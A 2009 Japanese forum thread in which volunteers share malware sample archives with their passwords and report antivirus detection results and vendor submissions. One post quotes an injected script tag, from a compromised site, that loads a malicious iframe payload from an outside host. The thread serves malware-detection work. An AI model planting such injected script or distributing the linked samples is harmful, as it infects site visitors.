09/08/21 17:42:36
McAfee (Active Protection 無効)0/1
McAfeeに提出させて頂きました。
AVERT自動返信
File Name Findings Detection Type Extra
------------|------------|------------|------------|-----
fukkyuu0.exe |inconclusive | | |no
601:名無しさん@お腹いっぱい。
09/08/21 17:53:21
>>599
McAfee-GW-Edition=Webwasher-Gateway
のはず
確かMcAfeeかSecure ComputingのHPに「McAfeeはSecure Computingを買収」というプレスリリースがあった
602:名無しさん@お腹いっぱい。
09/08/21 20:19:56
>>599
元はドイツのWebwasher(McAfeeが買収した)。
旧Webwasherではいくつかの組み合わせがあったと思うが
(GDATAやFセキュみたいなマルチエンジン)、
VTのはAntiVir+McAfee。
UPXを引っ掛けていることから設定が異なると思われる。
603:名無しさん@お腹いっぱい。
09/08/21 20:40:12
>>595
Eset(NOD32)のひとです。ちょっと忙しかったのと、Symantecに浮気してしまったため、検出可否報告できません。
(NOD32ライセンスは生きているものの、家族PCに入れ直したので、そちらで検出試行するわけにもいかず・・・)
最近の傾向が云々ではなく、個人的事情で提出&報告できていないだけです。
攻撃手法も多角化して、複数のスクリプトを組み合わせて発動する・・・なんてマルウェアも
できてしまったので、提出数が膨大になるのもわかります。で、あまり多すぎると報告する余裕もないかも。
ログそのままだと冗長だから、手作業で修正していたし。
>>554
Esetはメールがほぼ100%来ないのでわかりにくいかも。
私の場合、検出漏れしたファイルは手動隔離しておき、後日復元したときに検出できるように
なっているかどうかテストしていました。
>>599
せっかくなのでSymantecに提出してみた。0/1
自動返答では攻撃コード見あたらず、手動解析待ちです とのこと。
604:名無しさん@お腹いっぱい。
09/08/21 23:05:47
>>599 ㌧
カスペ2010 22:41
0/1
提出しました。
605:名無しさん@お腹いっぱい。
09/08/22 03:18:57
うちに、
けいおん! 第11話 「ピンチ!?」 (BS-TBS 1280x720 DivX685 120fps ロゴ除去).avi scr
っていう、280MBもあるウイルスがやってきた。
カスペのヒューリスティックエンジンで検出してるが、ちょっとVirulTotalにアップしてみてる。
でかい検体は誰も提出しないのか???
606:名無しさん@お腹いっぱい。
09/08/22 04:59:57
P2P関連のウイルスなんて、知ったこっちゃない
607:名無しさん@お腹いっぱい。
09/08/22 09:42:49
>>605
VTにそんな大きいファイルはおくれないよ。
容量制限がある。
608:名無しさん@お腹いっぱい。
09/08/22 10:46:34
>>605
ウィルスを分離できれば、ウィルスだけ送る手もあるんだが・・・・・
PASSをつけて圧縮して、どこかのロダに揚げてみて。
スレチ違いだったら、ご容赦ください
609:名無しさん@お腹いっぱい。
09/08/22 11:37:44
スレチだ。ダウソ板にその手のスレがあるんでそっちでやれ。
610:名無しさん@お腹いっぱい。
09/08/22 13:37:24
昔と違って300MBあっても送れはするっぽい。
でも、既に出してた人がいて、再解析してもらおうとするとファイルがないと言われてワロタ。
URLリンク(www.virustotal.com)
>>608
中身はほとんどが無意味な文字列で埋め尽くされてて、圧縮したらすごく小さくなった。
URLリンク(www1.axfc.net)
pass:vir
zipのパスワードなし
611:名無しさん@お腹いっぱい。
09/08/22 14:15:59
キーワードが正しくありません
612:604
09/08/22 17:30:57
カスペ
>>599(>>604) tane0506 0+事後検知1=1/1でクローズ
Trojan.BAT.KillFiles.mb tane0506\fukkyuu0.exe (検知)
613:名無しさん@お腹いっぱい。
09/08/23 00:53:17
カスペ検知&返事
>>444 (>>450,451,457,461) tane0494
7+2=9/13、白2+1=3、残1、ファイル破損1で閉鎖
\ajowah.cn\video.php - No malicious code was found in this file.
>>495(>>500,505) tane0499
3+(2+2)=7/10、残3(1.html 32.js, tongji.js)
Trojan-Spy.Win32.Zbot.aafn \newadmins.ws\bot.exe
Trojan program Exploit.JS.Agent.amk \pop0p.cn\xx.html
pop0p.cnフォルダ
Exploit.JS.Agent.amk 、 a.jpg b.jpg 15.js 16.js Td14.htm y1.htmy tfl1.htm yut.htm
614:アプロダ”管理”人 ◆HL2fUAyECQ
09/08/23 02:17:17
うん、今までの流れ見てカスペ担当さんがジミーに良い仕事してくれてるし
個人的にはみんな荒れないで大事にアプロダ使って欲しいな
まだスレッドは崩壊してないし、まぁ職人さんもぼつぼつ戻ってきてください
そろそろいいでしょ?
615:名無しさん@お腹いっぱい。
09/08/23 02:19:54
ぽかぽか乙
616:名無しさん@お腹いっぱい。
09/08/23 15:20:11
なんで
改行
いれるん?
?
617:613
09/08/23 19:37:07
>>614
管理人さん、乙です。
またーりやりましょう。
618:名無しさん@お腹いっぱい。
09/08/26 03:03:47
Rising(ウイルスキラー)のアップロードフォームが変更。
URLリンク(mailcenter.rising.com.cn)
電話番号入れろみたいなアラートが出たけど、隣に出ている番号入れたら通った。
619:名無しさん@お腹いっぱい。
09/08/26 12:02:55
URLリンク(tane.sakuratan.com)
virus
中国の学生向けSNSで悪用されている、Flashがデフォルトで持っているXSS機能を使うスクリプト。
これ自体がexeを拾ったりはしないので微妙だけど、手法がおもしろかったので。
URLリンク(isc.sans.org)
620:名無しさん@お腹いっぱい。
09/08/26 18:25:45
>>619
URLリンク(www.virustotal.com)
McAfee (Active Protection 無効)0/1
McAfeeに提出させて頂きました。
AVERT自動返信
File Name Findings Detection Type Extra
--------------------|------------------------------|----------------------------|------------|-----
renren.js |inconclusive | | |no
621:名無しさん@お腹いっぱい。
09/08/26 19:25:10
>>619
Panda、GDATA2010(今回はavast!のみ)、ESET、Aviraへ提出
renren.js 5.3 KB MALWARE
622:名無しさん@お腹いっぱい。
09/08/27 01:27:51
>>619
NIS2009 1/1 JS.Frienren として検出しました。
623:名無しさん@お腹いっぱい。
09/08/27 07:57:38
>>582
に同意してたぶん復帰
>>619
Rising Internet Security 2010 22.10.03.00 (22.00.78)
スルー
既に提出済み(RS20090826160713343053)で安全文件でした。
624:名無しさん@お腹いっぱい。
09/09/02 21:35:00
URLリンク(tane.sakuratan.com)
virus
ネタ元 URLリンク(blog.trendmicro.co.jp)
625:名無しさん@お腹いっぱい。
09/09/02 22:48:20
>>624
Rising Internet Security 2010 22.11.02.10 (22.00.00.84)
avkill1.exe>>65: Backdoor.Win32.Drwolf.fkx
avkill1_1.exe: Backdoor.Win32.Drwolf.fkx
axa0829.exe: Backdoor.Win32.Meb.b
dldr1.exe: Trojan.Win32.Generic.11ECB8E2
dldr2.exe: Trojan.PSW.Win32.GameOnline.eto
gamepol1.exe: Trojan.DL.Win32.Undef.fvb
gamewow1.exe: Trojan.PSW.Win32.GameOnline.eto
gamewow2.exe: Trojan.PSW.Win32.GameOnline.eto
jcin02.exe: Trojan.Win32.Generic.11EBEA23
pec2.exe: Trojan.Win32.Generic.11ECF274
10/10
>>623の22.00.78は22.00.00.78の間違い
626:名無しさん@お腹いっぱい。
09/09/02 23:06:21
>>624
Symantec、Panda、GDATA2010(=avast!&BitDefender)、ESET、Kaspersky、TrendMicroへ提出
627:名無しさん@お腹いっぱい。
09/09/02 23:34:09
>>624
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
628:名無しさん@お腹いっぱい。
09/09/03 06:22:14
>>624
McAfee (Active Protection 無効)6/10
未検出分をMcAfeeに提出させて頂きました。
AVERT自動返信
File Name Findings Detection Type Extra
--------------------|------------------------------|----------------------------|------------|-----
avkill1.exe |new detection |generic downloader.x!bfj |Trojan |yes
avkill1_1.exe |inconclusive | | |no
axa0829.exe |new detection |refpron.gen |Trojan |yes
pec2.exe |new detection |generic.dx!ewu |Trojan |yes
629:名無しさん@お腹いっぱい。
09/09/03 16:46:39
>>624
avast!全部撃墜
630:名無しさん@お腹いっぱい。
09/09/03 17:14:25
なんとな~く、>>624さんと被ってるような気がしないでもないですが…久しぶりなので、重複チェックまで手がまわってません。
URLリンク(tane.sakuratan.com)
infected
■ 検体入手元 ■
MDL 2009/09/01~09/02 リネージュ資料室更新リスト 08/31~09/02
■ 提出済みのベンダー ■
Avira、AntiyLabs : FTP経由で提出済み
その他 : Norman、Zoner、nProtectを除いて一通り提出済み
631:名無しさん@お腹いっぱい。
09/09/03 17:28:28
もいっちょ
URLリンク(tane.sakuratan.com)
infected
■ 検体入手元 ■
MDL 2009/08/30~08/31
リネージュ資料室更新リスト 08/30
■ 提出済みのベンダー ■
Avira、AntiyLabs : FTP経由で提出済み
その他 : Norman、Zoner、nProtectを除いて一通り提出済み
632:Norton&Panda使用者
09/09/03 22:14:08
3台目のPCに現時点ではウイルスバスター2010をテスト中(というかライセンスがまだ1年もある・・・)
なのでウイルスバスター2010のクラウド機能がどのように機能するかというのもテストしてみる
しばらくはアップデートを止めて>>630と>>631の検体が後日アップデートなしで検出してくれるかどうか実験
PandaやMcAfeeのようなクラウド機能の働きをしてくれるかそれに期待、以上私事のレスでした
スレチゴメソ、出来る限りこういうレスは最小限にしようと思います
それと>>630さん検体提出乙です、あと現在でも検出報告まともにしてなくてごめんなさいね
633:名無しさん@お腹いっぱい。
09/09/03 23:31:33
>>632
>630-631の中には、本体ではない設定ファイルとかもあるので、白判定のままで正常なファイルにご注意を。
634:名無しさん@お腹いっぱい。
09/09/05 02:42:28
カスペ2010 1:43:00 (検体アップから時間が経過しているので、参考)
>>624㌧ (>>626代理提出㌧)9/10 残1(avkill1_1.exe) tane0508
Trojan-Downloader.Win32.Agent.cosy /avkill1.exe
Trojan-Downloader.Win32.DlfBfkg.acd /axa0829.exe
Trojan-Downloader.Win32.Klever.m /dldr1.exe
Trojan-GameThief.Win32.WOW.ski /dldr2.exe /gamewow1.exe /gamewow2.exe
Trojan.Win32.Agent.ctaj /gamepol1.exe
Trojan-Dropper.Win32.Agent.azbx /jcin02.exe
Trojan.Win32.Agent2.chwj /pec2.exe
>>630 ㌧&代理提出 ㌧ tane0409
64/152 (内訳略)
>>631㌧ &代理提出㌧ tane0410
46/61 (内訳略)
順次、提出します。
635:634
09/09/05 10:19:40
カスペからの返事
>>624(>>634) tane0508
avkill1_1.exe - Trojan-Downloader.Win32.Agent.coxq
9+1=10/10でクローズ
636:Norton&Panda使い
09/09/08 18:22:54
とりあえずウイルスバスター2010の結果報告
残念ながら>>630と>>631の検体での検出結果はアップデート無しによる検出はなし
後日アップデートでパターンファイル更新してようやく検出した検体が増えた
どうやらMcAfeeやPandaのような「パターンファイル更新なくてもインターネット接続してるだけで検体が対応して検出してくれる」ということはないようだ
(当然のことながらPandaはパターンファイル更新してなくても検体が対応してくれればガシガシと検出してくれる仕組み)
ただしそれと同時に嬉しい報告も
ウイルスバスター2010のアンチウイルスエンジンは新しくなってて↓のようなGeneric系の検出が増えてきた
URLリンク(www.trendmicro.co.jp)
2010でTROJ_GENERIC.DITで検出した検体をVTに投げてみた結果
URLリンク(www.virustotal.com)
2009と2010ではエンジンが違うみたいなので2010の検出率アップに期待できる
以上、私事の報告失礼しました
637:名無しさん@お腹いっぱい。
09/09/10 08:56:23
URLリンク(tane.sakuratan.com)
infected
●MDL 2009/09/02-09/04+mixiに貼られていたもの
URLリンク(tane.sakuratan.com)
infected
●MDL 2009/09/05-09/09+リネージュ資料室のリスト+spamメール添付ファイル
■提出済みのベンダー
AviraとAntiyLabsには、ftp経由で提出済み。他ベンダーは未提出。
備考
例によって、設定ファイルも含めているので、白判定のファイル多いかと。
一括してダウンローダで落とした後、ファイルを全部チェックした訳じゃないので
サーバーのエラーメッセージとか、失効ドメインのページとかも混ざってるかもしれません。
時間のある方は、提出する前にその辺もチェックした方がいいかも。
638:名無しさん@お腹いっぱい。
09/09/10 10:40:55
ここまでSymantecとa-squaredとMalwarebytesに提出しました
639:名無しさん@お腹いっぱい。
09/09/10 18:33:44
>>637
tane0511
McAfee (Active Protection 無効)25/53
tane0512
McAfee (Active Protection 無効)64/179
未検出分をMcAfeeに提出させて頂きました。
AVERT自動返信
省略させて頂きます。
640:名無しさん@お腹いっぱい。
09/09/10 21:30:57
カスペ2010 19:23
>>637 (tane0511) ㌧
36/53 (シグネチャ名略)
(1)59→ 4/7 (検出:*.exe (4files) //未検出:, get.php, index.php, Who_next.pdf)
(288→ 5/6(検出:s.swf, show.php, , sashh.exe, sashok、manual.pdf//未検出 index.php)
(3)94→4/7(検出:install.exe, s.swf, manual.pdf, show.php // 未検出 admin.php, dr.web*.exe, zipoer.bin)
(4)195→6/9 (112.exe, manual (1).pdf, , manual.pdf, s (1).swf, s.swf, show.php , //非検出:*.php (3files))
(5)fake→.3/3 (検出:*.exe (3files)
(6)Onlines→3/4 (検出:1199.exe, play.exe, movieplayer//非検出:uptv*.rar)
(7)tour6→4/5 (検出:, manual.pdf, s.swf, system32.exe.show.php, //未検出:admin.php)
(8)weeeeld.→3/4 (検出:goodYouAll.swf. isMiddleForm.pdf, load.exe//非検出:index.php)
(9)sns→1/3 (検出:darkst.png//未検出:*.htm(2files)) →見送り
(10) zeus→3/5 (検出→readme.pdf, services.pdf, sex-movie.exe、//未検出 1.rar, down..bin)
必要なものは適宜検出します。
641:名無しさん@お腹いっぱい。
09/09/10 22:05:52
カスペ2010 20:47
>>637 (tane0512) ㌧
95/178
フォルダ別
Bra 1/1
exploit
28zxc 3/4(index.php以外)
61 3/4(girl.htm以外)
78 0/1
112 0/0
125 2/7
213 2/2 (*.php)
add 3/4 (admin.php以外)
exp 1/4 update9.exe(のみ)
kvu 3/5 (2chv.htm, wordA.swfのみ)
poa 2/5 (pdf.pdf, swf.swfのみ)
FakeAV
AntiVirusPro 0/15 (*.htm)
Rogue 0/3 (*.htm)
trojanFakeRean 8/8 (*.exe)
直下3/8 (InternetAvtivirisPro.exe, file.exe, Installer.70084.exeのみ)
642:名無しさん@お腹いっぱい。
09/09/10 22:06:50
>>641
trojan
64 1/1
1.207 2/2
91.213 3/3
195 1/1
195.95 2/2
202 3/4 (zong.exeスルー)
203. 0/2 スルー
210 3/4 (xplaymovie.phpはスルー)
dfghs 17/17 (*.exe)
socks 1/1
spam 1/1
tour 1/1
aime 9/10 (xin.htmスルー)
ele 1/1
mlwc 2/2
zeus 18/54 詳細略
実行可能ファイルを中心に提出
643:641-642
09/09/11 17:25:31
>>637
カスペからの返事 16:21 (あまり意味がないかもしれないが...)
>>637(>>640) tane0511
36+2+数え間違い1=39/53 (残14提出せず。回答なし。)
59.125.231.241\Who_next.pdf - Exploit.Win32.Pidief.bqx
94.75.253.92\dr.web_cureit!.exe - Trojan-Spy.Win32.Zbot.aars
>>637(>>641-642) tane0512
95+7+3=105/178
exploit\125.128.6.11/he1.swf - Trojan program Exploit.JS.Agent.anq
exploit\kvumurij.cn\2cv.htm_ - Trojan-Downloader.JS.agent.eme,
exploit\kvumurij.cn\wordA.swf - Trojan-Dropper.SWF.BlackScreen.bv
FakeAV\setup.exe - Trojan-Dropper.Win32.Agent.bcpd
trojan\203.251.93.133\love.jpg, hosts.txt_ - Trojan.Win32.Qhost.lzy
trojan\202.104.237.2\zong.exe - Trojan-Downloader.Win32.Geral.dcn
zeus\bot(4).exe_ - Trojan-Spy.Win32.Zbot.aart
新規HEUR検知:3→当方でフォローします。
virus HEUR:Trojan-Downloader.Script.Generic /exploit/28zxc.ws/index.php /exploit/61.235.117.72/giri.htm
virus HEUR:Trojan.Script.Generic /exploit/poavlonini.com/show.php
提出済み・回答待ち:6→当方でフォローします。
(FakeAV\setup(1).exe, zeus\bot(7).exe, js.exe, trojan/../xin,htm, ,exploit\125.128.6.11\he2.swf he3.swf)
html, php, binなどの類は多すぎて手が回らず提出できず。黒は実際もっと多いと思う。気になる人は残提出してちょうだい
644:643
09/09/11 17:36:04
カスペ
>>637(>>641-643) tane0512
96+事後10=106/178
Backdoor.Win32.Bredolab.si trojan/spam_mail/M311b636f.zip/M311b636f.exe
数え漏れすまぬ。m(_ _;)m
645:名無しさん@お腹いっぱい。
09/09/13 02:18:27
URLリンク(tane.sakuratan.com)
infected
■ 検体入手元
MDL 2009/09/10-09/12+spamメール添付ファイル+mixiへの中華業者投稿
■ 検体提出先
Avira:今日はFTPがエラーなのでWebフォームから提出
AntiyLabs:FTP経由で提出完了
その他:未提出
■ 注意事項
>>637の備考に同じ
646:名無しさん@お腹いっぱい。
09/09/13 02:38:23
>>637(>>641-644) カスペ 1:50 検知
96+事後(10+6)=112/178
Trojan program Trojan.Win32.Buzus.bygt zeus\is.exe
Trojan program Trojan.Win32.Buzus.bygt zeus\bot(7).exe
Trojan.JS.Zapchast.w exploit\125.128.6.11\he3.swf
Trojan.JS.Zapchast.v exploit\125.128.6.11\he2.swf
Trojan-Downloader.JS.Zapchast.k exploit\125.128.6.11\Main.asp
Trojan-Downloader.JS.Zapchast.l exploit\125.128.6.11\index.htm
647:名無しさん@お腹いっぱい。
09/09/13 03:25:56
カスペ2010 1:50
>>645㌧ tane0513
51/94
(1)exploits 24/45
Packed.Win32.Krap.x \195\update.exe
Exploit.Win32.Pidief.bnr \213\fiveBelief.pdf, \220\oldChunksEtc.pdf
Exploit.Win32.Pidief系 \gero\cegmoprwx.pdf、 \libe\hasWordsBy.pdf、 \name\lineBookIpsum.pdf \sock\cdhpqtuvw.pdf
Exploit.JS.Pdfka.wd \google\readme.pdf
Exploit.SWF.Agent.au \geroyvoin.cn\manual.swf \soc\manual.swf
Exploit.SWF.Agent系 \213\willAmetSites.swf、 \libe\yearsWeb.swf
Worm.Win32.Bezopi.ds \220\load.exe
Dropper.SWF.BlackScreen系 \220\oneRandom.swf \google\flash.sw
Downloader.Win32.FraudLoad.wqza \name\load.exe
Downloader.Win32.Agent.cnrx \220\rm.exe
Trojan.Win32.Vilsel.bob \brberfsdfsdafs.com\load.exe
Dropper.SWF.BlackScreen.bs f
Packed.Win32.TDSS.z \google\load.exe
virus Worm.Win32.Pinit.fy \sock\file1.exe
virus HEUR:Trojan.Script.Generic \195\show.php \buse\show.php、 \brbe\index.php、 \gero\show.php
(2)FakeAV 1/4
Downloader.NSIS.Agent.bw setup.exe
(3)mixi 4/4 …シグネチャ:すべてTrojan.Win32.Pincav.f
(4)spam 8/10 (d9bc33f0.exeそそのzipスルー)
シグネチャ:すべてBackdoor.Win32.Bredolab系
648:名無しさん@お腹いっぱい。
09/09/13 03:26:53
>>647の続き
(5)trojan 7/13
Downloader.Win32.Delf.uyx b1.exe
Spy.Win32.Zbot.aarp fdet3.exe
Trojan.Win32.Sasfis.ewb file.exe
Downloader.Win32.Small.kew file.php
Ransom.Win32.BlueScreen.fu install.exe
Downloader.Win32.Agent.cpmn main.exe
Packed.Win32.TDSS.z video_codec1.56.987_setup.exe
(6)zeus 7/18
Downloader.Win32.FraudLoad.wfws \exe(1).exe
Banker.Win32.Bancos.ggx \exe.exe
Spy.Win32.Zbot系 \fgd.exe、 \ls.exe \money.exe \soft.exe \up1.exe
実行ファイル中心に提出
寝る。w
649:名無しさん@お腹いっぱい。
09/09/13 04:15:15
>>648さん乙
ここまでSymantecとa-squaredとMalwarebytesに提出しました
650:649 訂正
09/09/13 04:16:04
>>645さん乙
ここまでSymantecとa-squaredとMalwarebytesに提出しました
651:名無しさん@お腹いっぱい。
09/09/13 08:14:16
>>645
McAfee (Active Protection 無効)26/94
未検出分をMcAfeeに提出させて頂きました。
AVERT自動返信
URLリンク(tane.sakuratan.com)
652:名無しさん@お腹いっぱい。
09/09/13 12:39:55
URLリンク(tane.sakuratan.com)
virus
653:名無しさん@お腹いっぱい。
09/09/13 13:25:42
>>652
乙
Symantec、Panda、GDATA2010(avast!&BitDefender)、ESET、Kaspersky、TrendMicro、Avira、AVG、Ahnlabへ提出
filename: x1.exe
machine: Machine
result: See the developer notes
filename: x1_2.exe
machine: Machine
result: See the developer notes
filename: x150_2.exe
machine: Machine
result: See the developer notes
filename: x150.exe
machine: Machine
result: See the developer notes
filename: x150_1.exe
machine: Machine
result: See the developer notes
filename: x1_1.exe
machine: Machine
result: See the developer notes
654:名無しさん@お腹いっぱい。
09/09/13 14:04:00
Rising Internet Security 2010 22.12.06.02 (22.00.00.91)
>>652
x1.exe: Dropper.Win32.Undef.aze
x150.exe: Dropper.Win32.Undef.aze
x150_2.exe: Trojan.PSW.Win32.OnlineGame.ztj
x1_2.exe: Trojan.PSW.Win32.OnlineGame.ztj
4/6
検体提出完了
RS20090913125614984618
655:653
09/09/13 14:18:12
>>652
Kasperskyから
New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.
x1_1.exe, x150_1.exe - Trojan-Dropper.Win32.Agent.bcpu
At the moment these files are detected. Please update your antivirus bases.
656:647
09/09/13 15:30:05
>>645(>>647-648) tane0513
カスペからの返事
51+9=60/94
spam_mail\D9bcf33f0.exe - Backdoor.Win32.Bredolab.vd (zipも検出)
FakeAV\Scanner-5920e39_2020-1.exeTrojan.Win32.FraudPack.tgw
trojan\test_b.exe_ - Trojan-Downloader.Win32.FraudLoad.wrfc
trojan\install(1).exe - Trojan-Downloader.Win32.FraudLoad.wrgf
trojan\spyware.exe_ - Email-Worm.Win32.Iksmas.etj
zeus\CCleaner2.19.exe - Trojan-Spy.Win32.Zbot.aaua
検知 14:04
Trojan-Downloader.JS.ActiveX.cm exploits\213.163.89.54\index.php
Trojan program Exploit.Win32.Pidief.brj exploits\brberfsdfsdafs.com\pdf.pdf
>>637(>>641-644,646) tane0512
Trojan.JS.Agent.ano tane0512\exploit\61.235.117.72\giri.htm (←HEUR)
657:名無しさん@お腹いっぱい。
09/09/13 16:11:41
>>652
McAfee (Active Protection 無効)4/6
未検出分をMcAfeeに提出させて頂きました。
AVERT自動返信
File Name Findings Detection Type Extra
--------------------|------------------------------|----------------------------|------------|-----
x1_1.exe |inconclusive | | |no
x150_1.exe |inconclusive | | |no
658:名無しさん@お腹いっぱい。
09/09/13 18:40:24
>>645さん乙
a-squaredとMalwarebytesに提出しました
659:名無しさん@お腹いっぱい。
09/09/13 22:33:04
カスペ 21:50
>>637(>>641-644) tane0512
96+11=107/178
Trojan-Dropper.Win32.Agent.bcug tane0512\FakeAV\setup(1).exe (返答)
>>645(>>647-648,656) tane0513
51+10=61/94
Trojan.Win32.VkHost.bm tane0513\trojan\price.php (検知)
>>652㌧(>>653代理提出乙、>>655) tane0515 6/6
Trojan-Downloader.Win32.Fiegi.as x1.exe、 x150.exe
Trojan-Downloader.Win32.small.angx x1_2.exe、 x150_2.exe
Trojan-Dropper.Win32.Agent.bcpu x1_1.exe、 x150_1.exe
660:名無しさん@お腹いっぱい。
09/09/17 01:05:15
URLリンク(image46.bannch.com)
URLリンク(image37.bannch.com)
URLリンク(h1.ripway.com)
661:名無しさん@お腹いっぱい。
09/09/17 14:51:27
>>660
>>2-3
>・ブラクラや危険サイトのURL直リン厳禁
> ブラクラ等、感染サイトなど、想定しないものを無言で貼らないこと。
> 怪しいサイトの安全性を鑑定するサイトではありません!
>
>※鑑定したい人は勝手に下のVirusTotalなどを使用してください。
Aviraは1つスルー(他社では検出)。詳細についてはテンプレ違反のためスルー。
662:名無しさん@お腹いっぱい。
09/09/21 22:06:23
>>660
0112370262.rarを解凍後、crafter.exeが出できた。
crafter.exeはuniversal extractorでスキャン、自己解凍式7-zipファイルなので解凍。
avast.exeとcrafter.exeが出てきた。
avast.exeをVIRUSTOTALに送信。
結果
URLリンク(www.virustotal.com)
663:名無しさん@お腹いっぱい。
09/09/21 22:10:02
>>662
これじゃね
URLリンク(www.iso-g.com)
664:名無しさん@お腹いっぱい。
09/09/21 23:32:25
URLリンク(tane.sakuratan.com)
infected
本体はswfファイルですがスクリプトとHTMLも同梱
検体入手元
redstone-walker●com (修正済み,SCOにキャッシュ有)
loan-5●sakura●ne●jp/bank-loan/google_service.js
VirusTotal結果: 1/41
URLリンク(www.virustotal.com)
目新しい感じだったので以下補足
以下のような形で挿入されていました。
ノートンではサイト閲覧時にブロックされたとのこと
<ul>
<li>本文</li>
<li>本文</li>
・・・
<li>本文</li>
</ul><script src=http ://loan-5●sakura●ne●jp/bank-loan/google_service.js></script>
<p>本文</p>
国内ドメインではありますがファイル名が自称googleととても怪しい
中身はiframeによる隠しswfファイル
上記修正済みサイトによるとFTPによる改ざんらしい
状況としては黒っぽいのですがほとんどスルーでした
このファイルが置いてあるloanのほうも危ないような・・・
Aviraには提出してみます
665:名無しさん@お腹いっぱい。
09/09/21 23:40:52
>>664
Symantec、Panda、GDATA2010(avast!&BitDefender)、ESET、TrendMicro、Kaspersky、AVG、Ahnlabへ提出
・・・・自分が積極的に送ってる提出先ってAhnlab以外は全部大手ベンダーだな
McAfeeは面倒だから送ってない
666:名無しさん@お腹いっぱい。
09/09/22 03:22:54
>>664
Avira完了済み
F-Secureも送信しました
667:名無しさん@お腹いっぱい。
09/09/22 06:07:19
>>664
McAfee (Active Protection 無効)0/3
未検出分をMcAfeeに提出させて頂きました。
AVERT自動返信
File Name Findings Detection Type Extra
--------------------|------------------------------|----------------------------|------------|-----
ad_top.swf |inconclusive | | |no
gad_160x600.htm |inconclusive | | |no
google_service.js |inconclusive | | |no
668:名無しさん@お腹いっぱい。
09/09/22 12:46:05
>>664
やっぱり黒だったみたいです
総スルーだったから自信なかったけど提出してよかった・・・
Aviraは解析待ち中
F-Secureメール返信
Malicious code found detection will be added on these files as follows:
google_service.js - Trojan:JS/Iframe.DR
ad_top.swf - Exploit:SWF/SWFdloader.M
WebのstatusはNO DETECTIONになってますが検出されるみたいだから
メールのほうが正しいのかな
google_service.js(1/41)
URLリンク(www.virustotal.com)
ad_top.swf (3/41)
URLリンク(www.virustotal.com)
669:名無しさん@お腹いっぱい。
09/09/22 13:20:39
>>664
Comodo提出済み
670:名無しさん@お腹いっぱい。
09/09/22 14:19:48
>>664
Risingスルー
提出完了
RS20090922131412296245
671:名無しさん@お腹いっぱい。
09/09/22 21:49:31
あのさ、スレちの質問ですまないんだけど
(ここの人、頻繁に検体送ってるので詳しいんじゃないかと思いあえて質問)
Pandaの無料のやつ、性能的にメインパソコンに入れても大丈夫?
ほかの優秀な検知率のソフトに比べてPandaのクラウドはどうなの?
672:名無しさん@お腹いっぱい。
09/09/22 23:00:23
>>671
スレリンク(sec板)
673:Norton&Panda使い
09/09/23 02:18:15
>>671
性能的にはPandaはまだ不安定じゃないかなと思う
一応AV-Testでは99%の検出結果を出してるけどまだ楽観視できるレベルじゃない
というのもPandaはウイルスバスターと同様に第三者テスト機関に参加しなさ過ぎる
NortonやGDATA、BitDefenderやKasperskyにESETやMcAfeeみたいにAV-ComparativesやVB100にコンスタントに参加してかつ安定した成績を修めてないとPandaの性能は認められるようなものじゃない
とはいえ個人的な感想としてはそういうテスト組織を抜きに良いソフトだとは思う
というのもクラウドを用いた検出性能はやはり強力だと思うしクラウド+ヒューリスティックの合わせ技はさらに強力
また検体提出した後のウイルス対応速度は割りと速いほうなので好感が持てる
誤検出の方はわからないけどPandaのクラウドはNorton同様のユーザーコミュニティの情報共有システムだしホワイトリストを導入してるから誤検出は少なくなるとは思う
以上矛盾した個人的な感想でした
674:名無しさん@お腹いっぱい。
09/09/23 02:30:57
28 名前:AV(NOD32)部分のテンプレその18 [sage] 投稿日:2009/09/13(日) 05:13:21
■NOD32を良いランク付けにしているテストの対する板常連の意見。
URLリンク(www.av-comparatives.org)
AV-Comparatives.orgのランク付けは、一般消費者には、あまり意味のないものがある。
ランク付けで最も重視された基準は、本物のウイルスの検出数ではなく、誤検出の数。
URLリンク(www.av-comparatives.org)
↑
この資料の6ページ目に、誤検出数の具体的な個数が書いていましたが、
Fortinetという製品(1000以上の誤検出)以外は、
全サンプル中で、たった0個から36個の誤検出に過ぎませんでした。
実際のユーザー環境では、誤検出してもベンダーに真偽を確認すれば済むが、
本物のウイルスを検出できないのは致命的です。
今回からのプロアクティブ性能のランク付けでは、
誤検出が18個で、本物のウイルスを14628個できている製品よりも、
誤検出は8個でも、本物のウイルスは5659個しか検出できていない製品の方がランクが上となっています。
■有名なアンチウイルスのテスト機関の情報
1998年からVirus BulletinがVB100アワードを開始。
VB100アワードは、2008年までESETがプラチナ・スポンサーでした。
2009年は、ESETとK7Computingがプラチナ・スポンサーです。
URLリンク(www.virusbtn.com)
675:名無しさん@お腹いっぱい。
09/09/23 02:35:23
VB100厨=基地外NOD厨
676:名無しさん@お腹いっぱい。
09/09/23 02:58:20
>>674
素人がうるせえよ
677:名無しさん@お腹いっぱい。
09/09/23 03:33:38
>>674
なるほどねえ。
統一した評価基準みたいなものがないから。
678:名無しさん@お腹いっぱい。
09/09/23 09:40:52
AV-Comparatives 2009年8月 オンデマンド検出力テスト
URLリンク(www.av-comparatives.org)
■Advanced+ ★★★
G DATA 20.0 99.8%
Symantec Norton 17.0 98.4%
avast! Pro 4.8 98.0%
F-Secure 10.00 97.9%
BitDefender 13.0 97.8%
eScan 10.0 97.7%
ESET NOD32 4.0 97.2%
----------------------------------------------------------------
■Advanced ★★
AVIRA Premium 9.0 99.4%
McAfee VirusScan Plus 13.11 98.7%
TrustPort 2.8 97.6%
AVG 8.5 94.0%
Kaspersky 9.0 94.7%
----------------------------------------------------------------
■STANDARD ★
Microsoft Live OneCare 2.5 90.0%
----------------------------------------------------------------
■TESTED
Sophos 7.6 91.3%
Kingsoft 2009.08 86.4%
Norman 7.10 84.8%
※誤検出が多いと減点される
※TrendMicroは検出率が最低ラインに達していないため評価外
679:名無しさん@お腹いっぱい。
09/09/23 09:46:03
決められたルール合意の上での一発勝負なわけだからね
地道をあげてる企業はおのずから上位に向かうし、
新種に対して100%とか99.8%とかありえないのは、すくなくともここの人は分かってることだろうから
あとは各自が判断目安にすればいいだけでしょうね
今後クラウド時代でテストどうするんだろうか
680:名無しさん@お腹いっぱい。
09/09/23 10:18:51
>>678-679
コピペ荒らし乙
VB100厨、AV-Comparatives厨=NOD32厨
681:名無しさん@お腹いっぱい。
09/09/23 10:21:36
スレリンク(sec板:976番)
